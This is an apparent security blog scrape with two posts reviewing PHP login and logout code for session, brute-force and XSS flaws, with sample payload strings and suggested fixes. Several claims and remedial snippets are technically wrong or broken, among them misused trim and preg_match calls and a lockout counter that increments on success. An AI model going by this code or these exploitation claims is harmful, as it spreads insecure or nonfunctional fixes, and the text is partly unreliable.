<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">References:
</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt;">1. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#UTF-%C2%AD%E2%80%907_encoding">https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#UTF-‐7_encoding</a> </span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;">2. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="http://php.net/manual/en/function.mb-%C2%AD%E2%80%90convert-%C2%AD%E2%80%90encoding.php">http://php.net/manual/en/function.mb-‐convert-‐encoding.php</a><br />
</span><span style="font-family: "cambria"; font-size: 12.000000pt;">3. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="http://shiflett.org/blog/2005/dec/google-%C2%AD%E2%80%90xss-%C2%AD%E2%80%90example">http://shiflett.org/blog/2005/dec/google-‐xss-‐example</a><br />
</span><span style="font-family: "cambria"; font-size: 12.000000pt;">4. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="http://www.motobit.com/util/charset-%C2%AD%E2%80%90codepage-%C2%AD%E2%80%90conversion.asp" target="_blank">http://www.motobit.com/util/charset-‐codepage-‐conversion.asp</a></span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;">5. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="http://openmya.hacker.jp/hasegawa/security/utf7cs.html">http://openmya.hacker.jp/hasegawa/security/utf7cs.html</a> </span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;">6. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="http://wiremask.eu/?p=tutorials&id=10" target="_blank">http://wiremask.eu/?p=tutorials&id=10 </a></span></div>
<br />
<br /><div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-75468527300068111112014-04-15T16:20:00.000-07:002017-01-12T14:35:07.349-08:00PHP Source Code Chunks of Insanity (Logout Pages) Part 2<b>Intro </b><br />
<br />
This post is going to talk about source code reviewing PHP and demonstrate how a relatively small chunk of code can cause you lots of problems.<br />
<b><br /></b>
<b>The Code</b><br />
<br />
In this article we are going to analyze the code displayed below. The code displayed below might seem innocent for some , but obviously is not. We are going to assume that is used by some web site to de-validate the user credentials and allow the users to logout securely.<br />
<div>
<br /></div>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: <?php
2: require_once 'common.php';
3: if (isset($_SESSION['username']))//Insecure source
4: {
5: session_unset();// In properly destroyed session.
6: }
7: header('Location: index.php'); ?> </code></pre>
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<br />
I you look carefully the code you will se that the code is vulnerable to the following issues:<br />
<ol>
<li>
<span style="font-family: "cambria"; font-size: 12.000000pt;">NULL De-Authentication Bypass </span></li>
<li>
<span style="font-family: "cambria"; font-size: 12.000000pt;">No Proper Session Termination </span></li>
</ol>
Think this is not accurate , think better.<br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 16.363636016845703px;"><b>NULL De-Authentication Bypass </b></span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Exploitation:</span><br />
<div>
<div class="column">
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt;">An adversary may on purpose exploit this vulnerability possibly without the need of developing any
costume tools (but needs a good understanding of PHP design flaws). More specifically an adversary
can manipulate the cookie parameter and de-‐validate the logout process by injecting a NULL value in
the begging of the username (after the authentication). This would result into maintaining the user
Web resources available for the specific session-‐id even after the logout is performed. </span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Vulnerable Code:</span><span style="font-family: "cambria"; font-size: 12pt;"> </span></div>
</div>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">if (isset($_SESSION['username']))// Malicious de-validation cancel
</code></pre>
<span style="font-family: "cambria"; font-size: 12pt;">Assuming that the target username is user12 potential malicious payloads that could exploit the
vulnerability displayed above would be </span><span style="color: #8db3e2; font-family: "cambria"; font-size: 12pt; font-style: italic;">user[space]12 , %4e%55%4c%4c,user12, user12[space],
%20user12, [space] [space]user12 [space],user12 , user12, user12,, user12NULL NULLuser12
</span><span style="font-family: "cambria"; font-size: 12pt;">etc. This is applicable due to the fact that if multiple parameters are supplied then the </span><span style="color: #8db3e2; font-family: "cambria"; font-size: 12pt; font-style: italic;">isset </span><span style="font-family: "cambria"; font-size: 12pt;">will return
TRUE only if all of the parameters are set. Evaluation goes from left to right and stops as soon as an
unset variable is encountered. The attack should occur after the user successfully authenticates her
self.</span><br />
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Note1: </span><span style="font-family: "cambria"; font-size: 12pt;">At this point it should be noted that when on, </span><span style="color: rgb(55.294120% , 70.196080% , 88.627450%); font-family: "cambria"; font-size: 12pt; font-style: italic;">register_globals </span><span style="font-family: "cambria"; font-size: 12pt;">(which is on by default in PHP <
5.3.0), will allow an adversary to populate the cookie username variable from various user input such
request variables from HTML hidden form fields, Web Application URL’s etc. which translates into
working as a vulnerability amplifier! Also this might lead into allowing POST to GET interchanges,
promoting CSRF like attacks (e.g. the web app does not distinguish POST from GET).</span><br />
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Note2: </span><span style="font-family: "cambria"; font-size: 12pt;">This feature has been DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0. </span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Remedial Code:</span><br />
<div class="column">
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: //the filter makes sure the username has no spaces. if (strpos($username, " ") !== false){
2: // De-‐validate the session
3: }
</code></pre>
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">2nd Code Chunk:</span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: trim("^$", $username)//Not recommended to process malicious payloads, only identify.
</code></pre>
<br />
<div class="column">
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12.000000pt;">The NULL value translates into an empty string when validations come. </span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 16.363636016845703px;"><b>No Proper Session Termination</b></span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">An adversary may on purpose exploit this vulnerability without the need of developing any costume
tools. This attack might be used to perform vertical/horizontal user escalation (e.g. the cookie session-‐
id is assigned to a new user, and the new user automatically gains access to previous user Web
resources, assuming that the Web Apps makes access control decisions by using only the session-‐id.
Another attack scenario would be that the session is leaked though a blog post and the adversary
makes use of the non de-‐validated leaked session to gain access to the Web Application user resources
etc.).</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Vulnerable Code:</span><span style="font-family: "cambria"; font-size: 12.000000pt;"> </span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: session_unset(); // Improper handling of the session.
</code></pre>
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Note1: </span><span style="font-family: "cambria"; font-size: 12pt;">The function shown above does not properly de-‐validate the session. The session_unset
function just clears the </span><span style="color: #8db3e2; font-family: "cambria"; font-size: 12pt; font-style: italic;">$_SESSION </span><span style="font-family: "cambria"; font-size: 12pt;">variable. It’s equivalent to doing </span><span style="color: #548dd4; font-family: "cambria"; font-size: 12pt; font-style: italic;">$_SESSION = array(); </span><span style="font-family: "cambria"; font-size: 12pt;">So this does
only affect the local </span><span style="color: #8db3e2; font-family: "cambria"; font-size: 12pt; font-style: italic;">$_SESSION </span><span style="font-family: "cambria"; font-size: 12pt;">variable instance, but not the session data in the session storage,
everything else remains unchanged (including the session identifier). In this occasion the
session_unset is used to destroy/reset the session instead of the </span><span style="color: #548dd4; font-family: "cambria"; font-size: 12pt; font-style: italic;">session_destroy </span><span style="font-family: "cambria"; font-size: 12pt;">function in the logout
page. The </span><span style="color: #8db3e2; font-family: "cambria"; font-size: 12pt; font-style: italic;">session_destroy() </span><span style="font-family: "cambria"; font-size: 12pt;">function destroys all of the data associated with the current session.</span><br />
<div class="column">
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Note2: </span><span style="font-family: "cambria"; font-size: 12pt;">The variable </span><span style="color: #548dd4; font-family: "cambria"; font-size: 12pt; font-style: italic;">session_unset </span><span style="font-family: "cambria"; font-size: 12pt;">is considered to be deprecated code that does not use </span><span style="color: #548dd4; font-family: "cambria"; font-size: 12pt; font-style: italic;">$_SESSION.</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Remedial Code: </span></div>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">1: function destroySession() {
2: $params = session_get_cookie_params(); setcookie(session_name(), '', time() -‐ 42000,
3: $params["path"], $params["domain"],
4: ... );
5: session_destroy(); }
</code></pre>
<span style="font-family: "cambria"; font-size: 16.363636016845703px; font-weight: bold;"><br /></span>
<span style="font-family: "cambria"; font-size: 16.363636016845703px; font-weight: bold;"><br /></span>
<span style="font-family: "cambria"; font-size: 16.363636016845703px; font-weight: bold;"><br /></span>
<span style="font-family: "cambria"; font-size: 16.363636016845703px; font-weight: bold;"><br /></span>
<span style="font-family: "cambria"; font-size: 16.363636016845703px; font-weight: bold;">References:</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt;">1. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="http://php.net/manual/en/security.globals.php">http://php.net/manual/en/security.globals.php</a><br />
</span><span style="font-family: "cambria"; font-size: 12.000000pt;">2. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="https://www.owasp.org/index.php/Unvalidated_Input" target="_blank">https://www.owasp.org/index.php/Unvalidated_Input</a></span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;">3. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="http://php.net/manual/en/function.isset.php">http://php.net/manual/en/function.isset.php</a><br />
</span><span style="font-family: "cambria"; font-size: 12.000000pt;">4. </span><span style="color: rgb(0.000000% , 0.000000% , 100.000000%); font-family: "cambria"; font-size: 12.000000pt;"><a href="http://php.net/manual/en/function.trim.php">http://php.net/manual/en/function.trim.php</a> </span></div>
<br /></div>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-52912019467601595592014-04-14T15:15:00.001-07:002017-01-12T14:35:14.113-08:00PHP Source Code Chunks of Insanity (Logins Pages) Part 1<b>Intro </b><br />
<br />
This post is going to talk about source code reviewing PHP and demonstrate how a relatively small chunk of code can cause you lots of problems.<br />
<br />
<b>The Code</b><br />
<br />
In this article we are going to analyze the code displayed below. The code displayed below might seem innocent for some , but obviously is not. We are going to assume that is used by some web site to validate the credentials and allow the users to login. <br />
<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> <?php
require_once 'commonFunctionality.php';
if (validateCredentials($someUsername, $somePassword)) {
header('Location: myIndex.php'); }
else {
header('Location: wrong_login.php'); }
?>
</code></pre>
<br />
If you look carefully the code you will se that the code is vulnerable to the following issues:<br />
<ol>
<li><span style="font-family: "cambria"; font-size: 12pt;">Reflected/Stored XSS</span></li>
<li><span style="font-family: "cambria"; font-size: 12pt;">Session Fixation/Session Hijacking</span> </li>
<li><span style="font-family: "cambria"; font-size: 12pt;">Lock Out Mechanism Not In Place</span></li>
</ol>
Think this is not accurate , think better.<br />
<br />
<b>Session Fixation/Session Hijacking </b><br />
<br />
An adversary may on purpose exploit this vulnerability without the need of developing any costume tools (e.g. the session gets exposed in a blog post or within the same application or is passed in the http referrer and gets cached in a Web Proxy controlled by an adversary). Also this attack might be used to abuse user privileges (e.g. escalate privileges of one user by manipulating the session identifier, perform vertical and horizontal privilege escalation etc.). It should be noted at this point that the issues described above are possible only if the web application makes decisions based only on the session identifier.<br />
<br />
Vulnerable Code:<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">session_unset(); // Improper handling of the session.
</code></pre>
<br />
Explanation:<br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">The function shown above does not properly handle the session. The session_unset function just
clears the </span><span style="font-family: "cambria"; font-size: 12pt; font-style: italic;">$_SESSION </span><span style="font-family: "cambria"; font-size: 12pt;">variable. It’s equivalent to doing </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12pt; font-style: italic;">$_SESSION = array(); </span><span style="font-family: "cambria"; font-size: 12pt;">So this does only affect the
local </span><span style="color: rgb(55.294120% , 70.196080% , 88.627450%); font-family: "cambria"; font-size: 12pt; font-style: italic;">$_SESSION </span><span style="font-family: "cambria"; font-size: 12pt;">variable instance, but not the session data in the session storage, everything else
remains unchanged, including the session identifier. In this occasion the session_unset is used to clear
the session from user information, instead of the session_destroy function in the login page (instead of
the logout page), which translates into not logging out properly the previous user (e.g. the next user
will possibly again access to the account of the previous user).T</span><span style="font-family: "cambria"; font-size: 12pt;">he Web Application makes
decisions without evaluating other cookie parameters to give access to Web Resources (e.g. the
decision making process is the username, a variable called logged_in and the session id). Ideally this
should partly be fixed by using also another variable e.g. </span><span style="color: rgb(55.294120% , 70.196080% , 88.627450%); font-family: "cambria"; font-size: 12pt; font-style: italic;">$_SESSION[‘logged_in’] = true </span><span style="font-family: "cambria"; font-size: 12pt;">(see code
below). </span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Exploitation:</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">An adversary may on purpose exploit this vulnerability without the need of developing any costume
tools (e.g. the session gets exposed in a blog post or within the same application or is passed in the
http referrer and gets cached in a Web Proxy controlled by an adversary). Also this attack might be
used to abuse user privileges (e.g. escalate privileges of one user by manipulating the session
identifier, perform vertical and horizontal privilege escalation etc.). It should be noted at this point
that the issues described above are possible only if the web application makes decisions based only on
the session identifier.</span><br />
<br />
Business Impact:<br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">The possibility of this vulnerability going public (e.g. blog posts start appearing in the internet
revealing the issue) would cause severe costumer reputation and revenue loss; this vulnerability
allows an adversary to potentially launch personalized phishing attacks (e.g. deceive a user in clicking
a link with a fixed session etc.) abuse web application user privileges and possibly allow phishing
campaigns.</span><span style="font-family: "cambria"; font-size: 12pt;"> </span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Remedial Code:</span><span style="font-family: "cambria"; font-size: 12pt;"> </span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> function init_session() { ...
session_start(); // Start the php session
session_regenerate_id(true); // regenerated the session, delete the old one. $_SESSION['logged_in'] = true;
... }
</code></pre>
<span style="font-family: "cambria"; font-size: 12pt;">Regenerate the session ID anytime the session's status changes. That means any of the following:</span><br />
<div class="column">
<ol>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-size: 12pt;">User authentication (e.g. in the login page, other multiple authentication stages etc.).
</span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-size: 12pt;">Storing privilege level information in the session (e.g. temporary random variables, valid only
</span><br />
<span style="font-size: 12pt;">for the current session etc.)
</span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-size: 12pt;">Regenerate the session identifier whenever the user's privilege level changes. </span></li>
</ol>
</div>
<span style="font-family: "cambria"; font-size: 12pt;"><b>Lock Out Mechanism Not In Place</b></span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">An adversary may on purpose exploit this vulnerability without the need of developing any costume
tools (e.g. make use of Burp Intruder or Hydra to perform online password cracking attacks etc.).</span><br />
<br />
Vulnerable Code:<br />
<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> $username = $_POST['username']; $password = $_POST['password'];
</code></pre>
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12pt;">The Web Application should implement server side controls in the login page to prevent
password brute forcing attacks.</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Remedial Code:</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> function lockout($username, $password) { $now = time();
$counter = 0
if (validateCredentials){
$counter = $counter+1// Save that in database, retrieve login attempt times and compare the
times ...
} }
</code></pre>
<br />
<span style="font-family: "cambria"; font-size: 12pt;">The Web Application should take the following actions to prevent online dictionary attacks:</span><br />
<div class="column">
<ol>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-size: 12pt;">Make use of login attempt counters (e.g. allow 3 failed attempts within 30 minutes).
</span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-size: 12pt;">Associate the user IP with the session (e.g. generate proper audit trails to later on ban that ip).
</span><br />
<span style="font-size: 12pt;">Include the user's IP address from </span><span style="color: #8db3e2; font-size: 12pt; font-style: italic;">$_SERVER['REMOTE_ADDR'] </span><span style="font-size: 12pt;">in the session. Store it in
</span><br />
<span style="color: #8db3e2; font-size: 12pt; font-style: italic;">$_SESSION['remote_ip'].
</span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-size: 12pt;">Run integrity checks of the session (although this functionality might be included in another
</span><br />
<span style="font-size: 12pt;">function).
</span><br />
</li>
<li style="font-family: 'Cambria'; font-size: 12.000000pt;">
<span style="font-size: 12pt;">Include the user agent from </span><span style="color: #8db3e2; font-size: 12pt; font-style: italic;">$_SERVER['HTTP_USER_AGENT'] </span><span style="font-size: 12pt;">in the session. Store it in a session
</span><br />
<span style="font-size: 12pt;">variable </span><span style="color: #8db3e2; font-size: 12pt; font-style: italic;">$_SESSION['user_agent']. </span><span style="font-size: 12pt;">Then, on each subsequent request check that it matches
(Note: The user agent can be very easily spoofed).</span><span style="font-size: 12pt;"> </span></li>
</ol>
</div>
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12pt;">It should also be noted that since the session parameters are also populated with sensitive
information such as the username, further actions should be performed to remove all this
information (e.g. replace username with temporary user-‐id). Gaining access to the username can
significantly reduce a brute-‐force login attempt. </span><br />
<b style="font-family: Cambria; font-size: 12pt;"><br /></b>
<b style="font-family: Cambria; font-size: 12pt;">Reflected/Stored XSS</b><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">An adversary can exploit this vulnerability without the need of developing any costume tools. Point
and click tools are available in the Internet and might be used to exploit this vulnerability (e.g. Social
Engineering Tool etc.). Further escalating on the issue an adversary might use this attack to
compromise multiple company sites (e.g. make use of it as an XSS proxy).</span><br />
<div class="column">
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12.000000pt;">This might also lead into unrestricted redirection attacks. Due to limited amount of time in my
disposal no further investigation was conducted (e.g. load the login page to an Apache as and see if the
variable username is passed the URL or the location header field.) </span></div>
<br />
Vulnerable Code:<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> $_SESSION['username'] = $username;
</code></pre>
<br />
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12pt;">Even though we don’t have access to the rest of the Web App code, it is highly likely that the
username value might be displayed back to the user and the Http header fields. </span><br />
<br />
<span style="font-family: "cambria"; font-size: 12pt;">Remedial Code:</span><span style="font-family: "cambria"; font-size: 12pt;"> </span><br />
<br />
<div class="column">
<span style="font-family: "cambria"; font-size: 12.000000pt;">Provide Server Side filters for the vulnerability. Make use of regular expressions and html encode the
variables whether displayed back to the user or not (for providing security in depth and making sure
that the Set-‐Cookie header field or other fields cannot be abused).</span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;"><u>1st Layer of defense</u></span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
</div>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> $username = preg_match ("/[^a-‐zA-‐Z0-‐9_\-‐]+/", "", $username)
</code></pre>
<br />
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12.000000pt;">Ideally the username should be replaced with a temporary user id (preferable random that
expires along with the cookie session). Using regular expressions to replace parts of the input and
proceed with further processing the input is not recommended, once a malicious input is identified
should be rejected (e.g. using preg_replace instead of preg_match). Also note that this functionality
should ideally be also part of the validateCredentials function or the input should be processed before
used by the validateCredentials function. </span><br />
<br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><u>2nd Layer of defense</u></span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<br />
